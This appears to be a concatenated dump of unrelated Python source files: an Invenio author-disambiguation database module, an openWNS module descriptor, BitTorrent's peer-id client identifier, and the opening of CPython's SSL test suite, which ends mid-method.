            if ref in refs70x])
            for row in inspire_ids70x)

    # [(iids, [bibs])]
    inspired = list(chain(((iid, list(set(('100',) + bib for bib in bibs))) for iid, bibs in inspire_ids10x),
                          ((iid, list(set(('700',) + bib for bib in bibs))) for iid, bibs in inspire_ids70x)))
    assert all(len(x[1]) == 1 for x in inspired)
    # group the signatures by inspire id
    inspired = ((k, map(itemgetter(0), map(itemgetter(1), d)))
                for k, d in groupby(sorted(inspired, key=itemgetter(0)), key=itemgetter(0)))
    # [(inspireid, [bibs])]
    # attach, to every signature, the authors who claimed it (flag=2)
    inspired = [([(run_sql("""select personid
                              from aidPERSONIDPAPERS
                              where bibref_table like %s
                              and bibref_value=%s
                              and bibrec=%s
                              and flag='2'""", bib), bib)
                  for bib in cluster[1]], cluster[0])
                for cluster in inspired]
    # [([([pid], bibs)], inspireid)]
    for cluster, iid in inspired:
        pids = set(chain.from_iterable(imap(itemgetter(0), cluster)))
        if len(pids) > 1:
            print "InspireID: %s links the following papers:" % iid
            print map(itemgetter(1), cluster)
            print "More than one personid claimed them:"
            print list(pids)
            print
            continue
        if len(pids) == 0:
            # not even one paper with this inspireid has been
            # claimed, screw it
            continue
        pid = list(pids)[0][0]
        # The last step is to check all non-claimed papers for being
        # claimed by the person on some different signature.
        problem = (_select_from_aidpersonidpapers_where(select=['bibref_table', 'bibref_value', 'bibrec'], pid=pid, rec=bib[2], flag=2)
                   for bib in (bib for lpid, bib in cluster if not lpid))
        problem = list(chain.from_iterable(problem))
        if problem:
            print "A personid has claimed a paper from an inspireid cluster and a contradictory paper."
            print "Personid %d" % pid
            print "Inspireid cluster %s" % str(map(itemgetter(1), cluster))
            print "Contradicting claims: %s" % str(problem)
            print
def remove_clusters_except(excl_surnames): # remove_results_outside
    '''
    Deletes all disambiguation algorithm result records except records who are
    associated with the specified surnames.

    @param excl_surnames: author surnames
    @type excl_surnames: list
    '''
    excl_surnames = frozenset(excl_surnames)
    # cluster names look like 'surname.N...'; the part before the first dot
    # is the surname the cluster belongs to
    surnames = frozenset(name[0].split(".")[0] for name in run_sql("""select personid
                                                                      from aidRESULTS"""))
    for surname in surnames - excl_surnames:
        run_sql("""delete from aidRESULTS
                   where personid like %s""",
                (surname + '.%%',))
def get_clusters(): # get_full_results
    '''
    Gets all disambiguation algorithm result records.

    @return: disambiguation algorithm result records ((name, bibref_table, bibref_value, bibrec),)
    @rtype: tuple ((str, str, int, int),)
    '''
    return run_sql("""select personid, bibref_table, bibref_value, bibrec
                      from aidRESULTS""")
def get_existing_papers_and_refs(table, recs, refs): # get_bibrefrec_subset
    '''
    From the specified papers and bibref values it gets the existing ones.

    @param table: bibref_table
    @type table: int
    @param recs: paper identifiers
    @type recs: list [int,]
    @param refs: bibref values
    @type refs: list [int,]

    @return: paper identifiers and bibref values set((rec, bibref_value),)
    @rtype: set set((int, int),)
    '''
    # e.g. table 100 -> 'bibrec_bib10x'
    table = "bibrec_bib%sx" % str(table)[:-1]
    contents = run_sql("""select id_bibrec, id_bibxxx
                          from %s"""
                       % table)
    # sets give O(1) membership tests for the filter below
    recs = set(recs)
    refs = set(refs)
    # there are duplicates
    return set(ifilter(lambda x: x[0] in recs and x[1] in refs, contents))
#
# BibRDF utilities. To be refactored and ported to bibauthorid_bibrdfinterface #
#
def get_all_personids_with_orcid():
    """Return the set of author identifiers that carry an ORCID external id."""
    rows = run_sql("select personid from aidPERSONIDDATA where tag='extid:ORCID'")
    return set(row[0] for row in rows)
def get_records_of_authors(personids_set):
    """Return the set of record ids carried by any of the given authors."""
    authors_sqlstr = _get_sqlstr_from_set(personids_set)
    rows = run_sql("select bibrec from aidPERSONIDPAPERS where personid in %s" % authors_sqlstr)
    return set(row[0] for row in rows)
def author_exists(personid):
    """Check whether the author appears in aidPERSONIDDATA or aidPERSONIDPAPERS."""
    found_in_data = bool(run_sql("select * from aidPERSONIDDATA where personid=%s limit 1", (personid,)))
    found_in_papers = bool(run_sql("select * from aidPERSONIDPAPERS where personid=%s limit 1", (personid,)))
    return found_in_data or found_in_papers
#
#
# aidTOKEN ###
#
#
# ********** errors **********#
class TokenExistingException(Exception):
    """Raised when an attempt is made to update an already-stored token.

    We don't support updating the token; when somebody wants to update,
    we should raise an exception.
    """
    pass
# ********** setters **********#
def set_token(personid, token):
    """Set the ORCID token for an author.

    This is the token which is valid for 20 years.
    If a token already exists it is updated anyway, but the event is
    recorded as unexpected (see NOTE below).
    """
    if get_token(personid):
        # there was a token, but we can update it
        # currently it is not supported
        run_sql("update aidTOKEN set `token`=%s where personid=%s",
                (token, personid))
        # NOTE(review): the exception is raised only to be caught immediately
        # so register_exception can log a traceback; the bare 'except:' keeps
        # the call from propagating. Odd but apparently intentional.
        try:
            raise TokenExistingException
        except:
            register_exception(subject="""The token in aidTOKEN was updated.
                               This behaviour was not expected.""")
    else:
        # default behaviour
        change = 1
        run_sql("insert into aidTOKEN values \
                (%s, %s, %s)", (personid, token, change))
def delete_token(personid):
    """Delete a token for an author.

    It should be run when the token expires.

    @param personid: author identifier
    @type personid: int
    """
    run_sql("delete from aidTOKEN where personid=%s", (personid,))
def trigger_aidtoken_change(personid, change):
    """Trigger the change in aidTOKEN table on.

    @param personid: author identifier
    @param change: new value of the 'was_changed' flag
    """
    run_sql("update aidTOKEN set was_changed=%s where personid=%s",
            (change, personid))
# ********** getters **********#
def get_token(personid):
    """Get the ORCID token for an author.

    @return: matching rows (personid, token, was_changed); empty when none
    @rtype: tuple
    """
    return run_sql("select personid, token, was_changed from aidTOKEN where personid=%s", (personid,))
def get_all_tokens():
    """Get the ORCID token for every author.

    @return: rows of (personid, token, was_changed)
    @rtype: tuple
    """
    return run_sql("select personid, token, was_changed from aidTOKEN")
| gpl-2.0 |
creasyw/IMTAphy | framework/dllbase/PyConfig/dll/DLL.py | 1 | 1326 | ###############################################################################
# This file is part of openWNS (open Wireless Network Simulator)
# _____________________________________________________________________________
#
# Copyright (C) 2004-2007
# Chair of Communication Networks (ComNets)
# Kopernikusstr. 5, D-52074 Aachen, Germany
# phone: ++49-241-80-27910,
# fax: ++49-241-80-22242
# email: info@openwns.org
# www: http://www.openwns.org
# _____________________________________________________________________________
#
# openWNS is free software; you can redistribute it and/or modify it under the
# terms of the GNU Lesser General Public License version 2 as published by the
# Free Software Foundation;
#
# openWNS is distributed in the hope that it will be useful, but WITHOUT ANY
# WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR
# A PARTICULAR PURPOSE. See the GNU Lesser General Public License for more
# details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
###############################################################################
from openwns.module import Module
class DLL(Module):
    """openWNS module descriptor for the data-link-layer base.

    Registers itself with the framework under the name 'dll' and the
    library name 'dllbase'.
    """
    def __init__(self):
        super(DLL, self).__init__("dll", "dllbase")
| gpl-2.0 |
bbc/kamaelia | Sketches/RJL/bittorrent/BitTorrent/BitTorrent/ClientIdentifier.py | 4 | 8094 | # The contents of this file are subject to the BitTorrent Open Source License
# Version 1.1 (the License). You may not copy or use this file, in either
# source code or executable form, except in compliance with the License. You
# may obtain a copy of the License at http://www.bittorrent.com/license/.
#
# Software distributed under the License is distributed on an AS IS basis,
# WITHOUT WARRANTY OF ANY KIND, either express or implied. See the License
# for the specific language governing rights and limitations under the
# License.
#
# Written by Matt Chisholm
# Client list updated by Ed Savage-Jones - May 28th 2005
import re
# Regex fragment matching three "base64-style" version characters
# (digits, letters, '.' and '-'); interpolated into several patterns below.
v64p = '[\da-zA-Z.-]{3}'

# (pattern, client name) pairs used to identify a BitTorrent client from its
# raw peer-id.  Order matters: patterns are tried top to bottom and the first
# match wins, so catch-alls (e.g. the trailing Azureus rule) come last.
matches = (
    ('-AZ(?P<version>\d+)-+.+$'       , "Azureus"              ),
    ('M(?P<version>\d-\d-\d)--.+$'    , "BitTorrent"           ),
    ('T(?P<version>%s)0?-+.+$'%v64p   , "BitTornado"           ),
    ('-UT(?P<version>[\dA-F]+)-+.+$'  , u"\xb5Torrent"         ),
    ('-TS(?P<version>\d+)-+.+$'       , "TorrentStorm"         ),
    ('exbc(?P<bcver>.+)LORD.+$'       , "BitLord"              ),
    ('exbc(?P<bcver>[^-][^-]+)(?!---).+$', "BitComet"          ),
    ('-BC0(?P<version>\d+)-.+$'       , "BitComet"             ),
    ('FUTB(?P<bcver>.+).+$'           , "BitComet Mod1"        ),
    ('xUTB(?P<bcver>.+).+$'           , "BitComet Mod2"        ),
    ('A(?P<version>%s)-+.+$'%v64p     , "ABC"                  ),
    ('S(?P<version>%s)-+.+$'%v64p     , "Shadow's"             ),
    (chr(0)*12 + 'aa.+$'              , "Experimental 3.2.1b2" ),
    (chr(0)*12 + '.+$'                , "BitTorrent (obsolete)"),
    ('-G3.+$'                         , "G3Torrent"            ),
    ('-[Ll][Tt](?P<version>\d+)-+.+$' , "libtorrent"           ),
    ('Mbrst(?P<version>\d-\d-\d).+$'  , "burst!"               ),
    ('eX.+$'                          , "eXeem"                ),
    ('\x00\x02BS.+(?P<strver>UDP0|HTTPBT)$', "BitSpirit v2"    ),
    ('\x00[\x02|\x00]BS.+$'           , "BitSpirit v2"         ),
    ('.*(?P<strver>UDP0|HTTPBT)$'     , "BitSpirit"            ),
    ('-BOWP?(?P<version>[\dA-F]+)-.+$', "Bits on Wheels"       ),
    ('(?P<rsver>.+)RSAnonymous.+$'    , "Rufus Anonymous"      ),
    ('(?P<rsver>.+)RS.+$'             , "Rufus"                ),
    ('-ML(?P<version>(\d\.)+\d)(?:\.(?P<strver>CVS))?-+.+$',"MLDonkey"),
    ('346------.+$'                   , "TorrentTopia 1.70"    ),
    ('OP(?P<strver>\d{4}).+$'         , "Opera"                ),
    ('-KT(?P<version>\d+)(?P<rc>R\d+)-+.+$', "KTorrent"        ),
    # Unknown but seen in peer lists:
    ('-S(?P<version>10059)-+.+$'      , "S (unknown)"          ),
    ('-TR(?P<version>\d+)-+.+$'       , "TR (unknown)"         ),
    ('S\x05\x07\x06\x00{7}.+'         , "S 576 (unknown)"      ),
    # Clients I've never actually seen in a peer list:
    ('exbc..---.+$'                   , "BitVampire 1.3.1"     ),
    ('-BB(?P<version>\d+)-+.+$'       , "BitBuddy"             ),
    ('-CT(?P<version>\d+)-+.+$'       , "CTorrent"             ),
    ('-MT(?P<version>\d+)-+.+$'       , "MoonlightTorrent"     ),
    ('-BX(?P<version>\d+)-+.+$'       , "BitTorrent X"         ),
    ('-TN(?P<version>\d+)-+.+$'       , "TorrentDotNET"        ),
    ('-SS(?P<version>\d+)-+.+$'       , "SwarmScope"           ),
    ('-XT(?P<version>\d+)-+.+$'       , "XanTorrent"           ),
    ('U(?P<version>\d+)-+.+$'         , "UPnP NAT Bit Torrent" ),
    ('-AR(?P<version>\d+)-+.+$'       , "Arctic"               ),
    ('(?P<rsver>.+)BM.+$'             , "BitMagnet"            ),
    ('BG(?P<version>\d+).+$'          , "BTGetit"              ),
    ('-eX(?P<version>[\dA-Fa-f]+)-.+$',"eXeem beta"            ),
    ('Plus12(?P<rc>[\dR]+)-.+$'       , "Plus! II"             ),
    ('XBT(?P<version>\d+)[d-]-.+$'    , "XBT"                  ),
    ('-ZT(?P<version>\d+)-+.+$'       , "ZipTorrent"           ),
    ('-BitE\?(?P<version>\d+)-.+$'    , "BitEruct"             ),
    ('O(?P<version>%s)-+.+$'%v64p     , "Osprey Permaseed"     ),
    # Guesses based on Rufus source code, never seen in the wild:
    ('-BS(?P<version>\d+)-+.+$'       , "BTSlave"              ),
    ('-SB(?P<version>\d+)-+.+$'       , "SwiftBit"             ),
    ('-SN(?P<version>\d+)-+.+$'       , "ShareNET"             ),
    ('-bk(?P<version>\d+)-+.+$'       , "BitKitten"            ),
    ('-SZ(?P<version>\d+)-+.+$'       , "Shareaza"             ),
    ('-MP(?P<version>\d+)-+.+$'       , "MooPolice"            ),
    ('Deadman Walking-.+$'            , "Deadman"              ),
    ('270------.+$'                   , "GreedBT 2.7.0"        ),
    ('XTORR302.+$'                    , "TorrenTres 0.0.2"     ),
    ('turbobt(?P<version>\d\.\d).+$'  , "TurboBT"              ),
    ('DansClient.+$'                  , "XanTorrent"           ),
    ('-PO(?P<version>\d+)-+.+$'       , "PO (unknown)"         ),
    ('-UR(?P<version>\d+)-+.+$'       , "UR (unknown)"         ),
    # Patterns that should be executed last
    ('.*Azureus.*'                    , "Azureus 2.0.3.2"      ),
    )

# Pre-compile every pattern once; DOTALL because peer-ids may contain
# raw byte values, including newlines.
matches = [(re.compile(pattern, re.DOTALL), name) for pattern, name in matches]

# Cache of peer-ids already written to the "unknown client" log, so each
# unidentified peer-id is logged at most once (see identify_client below).
unknown_clients = {}
def identify_client(peerid, log=None):
    """Return a (client_name, version_string) pair for a raw peer-id.

    Tries each compiled pattern in ``matches`` in order and decodes the
    version from the first match's named groups.  If no pattern matches,
    falls back to a structural check for Shareaza 2.0-2.1.  When *log* is
    given, every still-unknown peer-id is appended to it once.

    NOTE(review): this is Python 2 code (``dict.has_key`` and integer
    ``/`` division); it must be ported before running under Python 3.
    """
    client = 'unknown'
    version = ''
    for pat, name in matches:
        m = pat.match(peerid)
        if m:
            client = name
            d = m.groupdict()
            if d.has_key('version'):
                version = d['version']
                version = version.replace('-','.')
                # If the version already contains dots, drop them so that
                # every remaining character is decoded individually below.
                if version.find('.') >= 0:
                    version = ''.join(version.split('.'))
                version = list(version)
                # Decode each character with a base64-like alphabet:
                # '0'-'9' stay as-is, 'A'-'Z' -> 10-35, 'a'-'z' -> 36-61,
                # '.' -> 62, '-' -> 63; anything else stops the decoding.
                for i,c in enumerate(version):
                    if '0' <= c <= '9':
                        version[i] = c
                    elif 'A' <= c <= 'Z':
                        version[i] = str(ord(c) - 55)
                    elif 'a' <= c <= 'z':
                        version[i] = str(ord(c) - 61)
                    elif c == '.':
                        version[i] = '62'
                    elif c == '-':
                        version[i] = '63'
                    else:
                        break
                version = '.'.join(version)
            elif d.has_key('bcver'):
                # BitComet/BitLord style: version bytes are raw ordinals,
                # second byte packs major/minor in its decimal digits.
                bcver = d['bcver']
                version += str(ord(bcver[0])) + '.'
                if len(bcver) > 1:
                    version += str(ord(bcver[1])/10)
                    version += str(ord(bcver[1])%10)
            elif d.has_key('rsver'):
                # Rufus style: like bcver but with a dot between the digits.
                rsver = d['rsver']
                version += str(ord(rsver[0])) + '.'
                if len(rsver) > 1:
                    version += str(ord(rsver[1])/10) + '.'
                    version += str(ord(rsver[1])%10)
            if d.has_key('strver'):
                # Literal version text captured directly from the peer-id.
                if d['strver'] is not None:
                    version += d['strver']
            if d.has_key('rc'):
                # Release-candidate suffix, e.g. "R12" -> "RC 12".
                rc = 'RC ' + d['rc'][1:]
                if version:
                    version += ' '
                version += rc
            break
    if client == 'unknown':
        # identify Shareaza 2.0 - 2.1
        # Shareaza's last 4 bytes are an XOR checksum of earlier bytes;
        # the for/else only assigns when every byte checks out.
        if len(peerid) == 20 and chr(0) not in peerid[:15]:
            for i in range(16,20):
                if ord(peerid[i]) != (ord(peerid[i - 16]) ^ ord(peerid[31 - i])):
                    break
            else:
                client = "Shareaza"
    if log is not None and 'unknown' in client:
        # Log each unrecognised peer-id only once per process.
        if not unknown_clients.has_key(peerid):
            unknown_clients[peerid] = True
            log.write('%s\n'%peerid)
            log.write('------------------------------\n')
    return client, version
| apache-2.0 |
yawnosnorous/python-for-android | python3-alpha/python3-src/Lib/test/test_ssl.py | 46 | 71268 | # Test the support for SSL and sockets
import sys
import unittest
from test import support
import socket
import select
import time
import gc
import os
import errno
import pprint
import tempfile
import urllib.request
import traceback
import asyncore
import weakref
import platform
import functools
# Skip the whole test module if the ssl extension is not available.
ssl = support.import_module("ssl")

# Protocol constants exercised by the parametrized tests below; SSLv2 is
# appended only when this OpenSSL build still exposes it.
PROTOCOLS = [
    ssl.PROTOCOL_SSLv3,
    ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1
]
if hasattr(ssl, 'PROTOCOL_SSLv2'):
    PROTOCOLS.append(ssl.PROTOCOL_SSLv2)

HOST = support.HOST

# Resolve a data file name relative to this test module's directory.
data_file = lambda name: os.path.join(os.path.dirname(__file__), name)

# The custom key and certificate files used in test_ssl are generated
# using Lib/test/make_ssl_certs.py.
# Other certificates are simply fetched from the Internet servers they
# are meant to authenticate.

CERTFILE = data_file("keycert.pem")
BYTES_CERTFILE = os.fsencode(CERTFILE)
ONLYCERT = data_file("ssl_cert.pem")
ONLYKEY = data_file("ssl_key.pem")
BYTES_ONLYCERT = os.fsencode(ONLYCERT)
BYTES_ONLYKEY = os.fsencode(ONLYKEY)
CAPATH = data_file("capath")
BYTES_CAPATH = os.fsencode(CAPATH)
SVN_PYTHON_ORG_ROOT_CERT = data_file("https_svn_python_org_root.pem")

EMPTYCERT = data_file("nullcert.pem")
BADCERT = data_file("badcert.pem")
# Deliberately nonexistent path, used to test ENOENT error handling.
WRONGCERT = data_file("XXXnonexisting.pem")
BADKEY = data_file("badkey.pem")
def handle_error(prefix):
    """In verbose mode, write the pending exception's traceback to stdout,
    preceded by *prefix*.  Must be called from inside an ``except`` block."""
    text = ' '.join(traceback.format_exception(*sys.exc_info()))
    if support.verbose:
        sys.stdout.write(prefix + text)
def can_clear_options():
    """Return True when OpenSSL is 0.9.8m or newer (options can be cleared)."""
    minimum = (0, 9, 8, 13, 15)
    return ssl._OPENSSL_API_VERSION >= minimum
def no_sslv2_implies_sslv3_hello():
    """Return True when OpenSSL is 0.9.7h or newer."""
    minimum = (0, 9, 7, 8, 15)
    return ssl.OPENSSL_VERSION_INFO >= minimum
# Issue #9415: Ubuntu hijacks their OpenSSL and forcefully disables SSLv2
def skip_if_broken_ubuntu_ssl(func):
    """Decorator raising SkipTest on Ubuntu's patched OpenSSL (issue #9415).

    Ubuntu forcefully disables SSLv2 in its OpenSSL build; on the affected
    debian/squeeze build the decorated test is skipped.  When the ssl module
    does not expose PROTOCOL_SSLv2 at all, the function is returned unchanged.
    """
    if not hasattr(ssl, 'PROTOCOL_SSLv2'):
        return func

    @functools.wraps(func)
    def wrapper(*args, **kwargs):
        try:
            ssl.SSLContext(ssl.PROTOCOL_SSLv2)
        except ssl.SSLError:
            # Only the known-broken Ubuntu build is skipped.
            if (ssl.OPENSSL_VERSION_INFO == (0, 9, 8, 15, 15) and
                    platform.linux_distribution() == ('debian', 'squeeze/sid', '')):
                raise unittest.SkipTest("Patched Ubuntu OpenSSL breaks behaviour")
        return func(*args, **kwargs)
    return wrapper
class BasicSocketTests(unittest.TestCase):
    """Tests that need no peer at all: module constants, RNG helpers,
    certificate parsing/conversion, hostname matching, and error behaviour
    of unconnected or misconfigured SSL sockets."""
    def test_constants(self):
        #ssl.PROTOCOL_SSLv2
        ssl.PROTOCOL_SSLv23
        ssl.PROTOCOL_SSLv3
        ssl.PROTOCOL_TLSv1
        ssl.CERT_NONE
        ssl.CERT_OPTIONAL
        ssl.CERT_REQUIRED
        self.assertIn(ssl.HAS_SNI, {True, False})
    def test_random(self):
        # RAND_status/RAND_egd/RAND_add are thin wrappers over OpenSSL's RNG.
        v = ssl.RAND_status()
        if support.verbose:
            sys.stdout.write("\n RAND_status is %d (%s)\n"
                             % (v, (v and "sufficient randomness") or
                                "insufficient randomness"))
        try:
            ssl.RAND_egd(1)
        except TypeError:
            pass
        else:
            print("didn't raise TypeError")
        ssl.RAND_add("this is a random string", 75.0)
    def test_parse_cert(self):
        # note that this uses an 'unofficial' function in _ssl.c,
        # provided solely for this test, to exercise the certificate
        # parsing code
        p = ssl._ssl._test_decode_cert(CERTFILE)
        if support.verbose:
            sys.stdout.write("\n" + pprint.pformat(p) + "\n")
    def test_DER_to_PEM(self):
        # Round-trip PEM -> DER -> PEM -> DER and check the DER forms agree.
        with open(SVN_PYTHON_ORG_ROOT_CERT, 'r') as f:
            pem = f.read()
        d1 = ssl.PEM_cert_to_DER_cert(pem)
        p2 = ssl.DER_cert_to_PEM_cert(d1)
        d2 = ssl.PEM_cert_to_DER_cert(p2)
        self.assertEqual(d1, d2)
        if not p2.startswith(ssl.PEM_HEADER + '\n'):
            self.fail("DER-to-PEM didn't include correct header:\n%r\n" % p2)
        if not p2.endswith('\n' + ssl.PEM_FOOTER + '\n'):
            self.fail("DER-to-PEM didn't include correct footer:\n%r\n" % p2)
    def test_openssl_version(self):
        n = ssl.OPENSSL_VERSION_NUMBER
        t = ssl.OPENSSL_VERSION_INFO
        s = ssl.OPENSSL_VERSION
        self.assertIsInstance(n, int)
        self.assertIsInstance(t, tuple)
        self.assertIsInstance(s, str)
        # Some sanity checks follow
        # >= 0.9
        self.assertGreaterEqual(n, 0x900000)
        # < 2.0
        self.assertLess(n, 0x20000000)
        major, minor, fix, patch, status = t
        self.assertGreaterEqual(major, 0)
        self.assertLess(major, 2)
        self.assertGreaterEqual(minor, 0)
        self.assertLess(minor, 256)
        self.assertGreaterEqual(fix, 0)
        self.assertLess(fix, 256)
        self.assertGreaterEqual(patch, 0)
        self.assertLessEqual(patch, 26)
        self.assertGreaterEqual(status, 0)
        self.assertLessEqual(status, 15)
        # Version string as returned by OpenSSL, the format might change
        self.assertTrue(s.startswith("OpenSSL {:d}.{:d}.{:d}".format(major, minor, fix)),
                        (s, t))
    @support.cpython_only
    def test_refcycle(self):
        # Issue #7943: an SSL object doesn't create reference cycles with
        # itself.
        s = socket.socket(socket.AF_INET)
        ss = ssl.wrap_socket(s)
        wr = weakref.ref(ss)
        del ss
        self.assertEqual(wr(), None)
    def test_wrapped_unconnected(self):
        # Methods on an unconnected SSLSocket propagate the original
        # socket.error raise by the underlying socket object.
        s = socket.socket(socket.AF_INET)
        ss = ssl.wrap_socket(s)
        self.assertRaises(socket.error, ss.recv, 1)
        self.assertRaises(socket.error, ss.recv_into, bytearray(b'x'))
        self.assertRaises(socket.error, ss.recvfrom, 1)
        self.assertRaises(socket.error, ss.recvfrom_into, bytearray(b'x'), 1)
        self.assertRaises(socket.error, ss.send, b'x')
        self.assertRaises(socket.error, ss.sendto, b'x', ('0.0.0.0', 0))
    def test_timeout(self):
        # Issue #8524: when creating an SSL socket, the timeout of the
        # original socket should be retained.
        for timeout in (None, 0.0, 5.0):
            s = socket.socket(socket.AF_INET)
            s.settimeout(timeout)
            ss = ssl.wrap_socket(s)
            self.assertEqual(timeout, ss.gettimeout())
    def test_errors(self):
        # Misuse of wrap_socket() must raise the documented exceptions.
        sock = socket.socket()
        self.assertRaisesRegex(ValueError,
                        "certfile must be specified",
                        ssl.wrap_socket, sock, keyfile=CERTFILE)
        self.assertRaisesRegex(ValueError,
                        "certfile must be specified for server-side operations",
                        ssl.wrap_socket, sock, server_side=True)
        self.assertRaisesRegex(ValueError,
                        "certfile must be specified for server-side operations",
                        ssl.wrap_socket, sock, server_side=True, certfile="")
        s = ssl.wrap_socket(sock, server_side=True, certfile=CERTFILE)
        self.assertRaisesRegex(ValueError, "can't connect in server-side mode",
                        s.connect, (HOST, 8080))
        with self.assertRaises(IOError) as cm:
            with socket.socket() as sock:
                ssl.wrap_socket(sock, certfile=WRONGCERT)
        self.assertEqual(cm.exception.errno, errno.ENOENT)
        with self.assertRaises(IOError) as cm:
            with socket.socket() as sock:
                ssl.wrap_socket(sock, certfile=CERTFILE, keyfile=WRONGCERT)
        self.assertEqual(cm.exception.errno, errno.ENOENT)
        with self.assertRaises(IOError) as cm:
            with socket.socket() as sock:
                ssl.wrap_socket(sock, certfile=WRONGCERT, keyfile=WRONGCERT)
        self.assertEqual(cm.exception.errno, errno.ENOENT)
    def test_match_hostname(self):
        # ok()/fail() assert ssl.match_hostname() accepts / rejects the pair.
        def ok(cert, hostname):
            ssl.match_hostname(cert, hostname)
        def fail(cert, hostname):
            self.assertRaises(ssl.CertificateError,
                              ssl.match_hostname, cert, hostname)
        cert = {'subject': ((('commonName', 'example.com'),),)}
        ok(cert, 'example.com')
        ok(cert, 'ExAmple.cOm')
        fail(cert, 'www.example.com')
        fail(cert, '.example.com')
        fail(cert, 'example.org')
        fail(cert, 'exampleXcom')
        cert = {'subject': ((('commonName', '*.a.com'),),)}
        ok(cert, 'foo.a.com')
        fail(cert, 'bar.foo.a.com')
        fail(cert, 'a.com')
        fail(cert, 'Xa.com')
        fail(cert, '.a.com')
        cert = {'subject': ((('commonName', 'a.*.com'),),)}
        ok(cert, 'a.foo.com')
        fail(cert, 'a..com')
        fail(cert, 'a.com')
        cert = {'subject': ((('commonName', 'f*.com'),),)}
        ok(cert, 'foo.com')
        ok(cert, 'f.com')
        fail(cert, 'bar.com')
        fail(cert, 'foo.a.com')
        fail(cert, 'bar.foo.com')
        # Slightly fake real-world example
        cert = {'notAfter': 'Jun 26 21:41:46 2011 GMT',
                'subject': ((('commonName', 'linuxfrz.org'),),),
                'subjectAltName': (('DNS', 'linuxfr.org'),
                                   ('DNS', 'linuxfr.com'),
                                   ('othername', '<unsupported>'))}
        ok(cert, 'linuxfr.org')
        ok(cert, 'linuxfr.com')
        # Not a "DNS" entry
        fail(cert, '<unsupported>')
        # When there is a subjectAltName, commonName isn't used
        fail(cert, 'linuxfrz.org')
        # A pristine real-world example
        cert = {'notAfter': 'Dec 18 23:59:59 2011 GMT',
                'subject': ((('countryName', 'US'),),
                            (('stateOrProvinceName', 'California'),),
                            (('localityName', 'Mountain View'),),
                            (('organizationName', 'Google Inc'),),
                            (('commonName', 'mail.google.com'),))}
        ok(cert, 'mail.google.com')
        fail(cert, 'gmail.com')
        # Only commonName is considered
        fail(cert, 'California')
        # Neither commonName nor subjectAltName
        cert = {'notAfter': 'Dec 18 23:59:59 2011 GMT',
                'subject': ((('countryName', 'US'),),
                            (('stateOrProvinceName', 'California'),),
                            (('localityName', 'Mountain View'),),
                            (('organizationName', 'Google Inc'),))}
        fail(cert, 'mail.google.com')
        # No DNS entry in subjectAltName but a commonName
        cert = {'notAfter': 'Dec 18 23:59:59 2099 GMT',
                'subject': ((('countryName', 'US'),),
                            (('stateOrProvinceName', 'California'),),
                            (('localityName', 'Mountain View'),),
                            (('commonName', 'mail.google.com'),)),
                'subjectAltName': (('othername', 'blabla'), )}
        ok(cert, 'mail.google.com')
        # No DNS entry subjectAltName and no commonName
        cert = {'notAfter': 'Dec 18 23:59:59 2099 GMT',
                'subject': ((('countryName', 'US'),),
                            (('stateOrProvinceName', 'California'),),
                            (('localityName', 'Mountain View'),),
                            (('organizationName', 'Google Inc'),)),
                'subjectAltName': (('othername', 'blabla'),)}
        fail(cert, 'google.com')
        # Empty cert / no cert
        self.assertRaises(ValueError, ssl.match_hostname, None, 'example.com')
        self.assertRaises(ValueError, ssl.match_hostname, {}, 'example.com')
    def test_server_side(self):
        # server_hostname doesn't work for server sockets
        ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
        with socket.socket() as sock:
            self.assertRaises(ValueError, ctx.wrap_socket, sock, True,
                              server_hostname="some.hostname")
class ContextTests(unittest.TestCase):
    """Tests of ssl.SSLContext construction and its configuration surface:
    protocol selection, cipher strings, option flags, verify_mode, and
    certificate/CA loading."""
    @skip_if_broken_ubuntu_ssl
    def test_constructor(self):
        if hasattr(ssl, 'PROTOCOL_SSLv2'):
            ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv2)
        ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
        ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv3)
        ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
        self.assertRaises(TypeError, ssl.SSLContext)
        self.assertRaises(ValueError, ssl.SSLContext, -1)
        self.assertRaises(ValueError, ssl.SSLContext, 42)
    @skip_if_broken_ubuntu_ssl
    def test_protocol(self):
        # The protocol passed to the constructor is reflected back as-is.
        for proto in PROTOCOLS:
            ctx = ssl.SSLContext(proto)
            self.assertEqual(ctx.protocol, proto)
    def test_ciphers(self):
        ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
        ctx.set_ciphers("ALL")
        ctx.set_ciphers("DEFAULT")
        with self.assertRaisesRegex(ssl.SSLError, "No cipher can be selected"):
            ctx.set_ciphers("^$:,;?*'dorothyx")
    @skip_if_broken_ubuntu_ssl
    def test_options(self):
        ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
        # OP_ALL is the default value
        self.assertEqual(ssl.OP_ALL, ctx.options)
        ctx.options |= ssl.OP_NO_SSLv2
        self.assertEqual(ssl.OP_ALL | ssl.OP_NO_SSLv2,
                         ctx.options)
        ctx.options |= ssl.OP_NO_SSLv3
        self.assertEqual(ssl.OP_ALL | ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3,
                         ctx.options)
        if can_clear_options():
            # Clearing option bits requires OpenSSL >= 0.9.8m.
            ctx.options = (ctx.options & ~ssl.OP_NO_SSLv2) | ssl.OP_NO_TLSv1
            self.assertEqual(ssl.OP_ALL | ssl.OP_NO_TLSv1 | ssl.OP_NO_SSLv3,
                             ctx.options)
            ctx.options = 0
            self.assertEqual(0, ctx.options)
        else:
            with self.assertRaises(ValueError):
                ctx.options = 0
    def test_verify(self):
        ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
        # Default value
        self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
        ctx.verify_mode = ssl.CERT_OPTIONAL
        self.assertEqual(ctx.verify_mode, ssl.CERT_OPTIONAL)
        ctx.verify_mode = ssl.CERT_REQUIRED
        self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
        ctx.verify_mode = ssl.CERT_NONE
        self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
        with self.assertRaises(TypeError):
            ctx.verify_mode = None
        with self.assertRaises(ValueError):
            ctx.verify_mode = 42
    def test_load_cert_chain(self):
        ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
